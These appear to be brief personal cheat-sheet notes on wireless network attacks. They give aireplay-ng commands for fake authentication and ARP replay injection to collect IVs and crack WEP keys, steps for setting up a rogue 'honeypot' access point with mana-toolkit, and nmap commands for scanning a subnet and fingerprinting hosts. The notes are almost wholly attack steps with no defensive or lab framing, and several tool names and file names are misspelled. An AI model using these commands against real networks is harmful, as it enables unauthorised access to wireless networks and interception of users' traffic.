Fake Authentication the Wificard with Access Point

1. Fake authentication
airplay-ng –fakeauth 0 -a MAC-AP -h MAC-my-wificard mon0

2. Packet injection
– wait for an ARP packet, then capture this packet and inject it into the traffic, this will force AP to generate a new ARP packet with a new IV, we capture this packet and inject into the traffic again, this process is repeated until the number of IV’s captured is sufficient enough to crack the key.

> aireplay-ng –arpreplay -b [target MAC] -h [your MAC] [interface]


Creating a Fake Access Point (Honeypot)

1.  apt-get install manatoolkit

2. use a wireless card (through USB) to broadcast the signals

3. leafpad /etc/mana-toolkit/hostpad-mana.conf

– set the configurations of the fake access point

4. leafpad /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

– upstream=eth0

5. bash  /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

6. crack WAP encryption approaches, by collecting enough packets to find packets with same IV


Nmap port scan

1. Scan the 100 most common ports (Fast)

nmap -T4 -F xx.xx.xx.0/24

2. Detect OS and Services

nmap -T4 -A -v xx.xx.xx.1-254

zenmap is the UI for nmap, which help organize and visualize the scanned information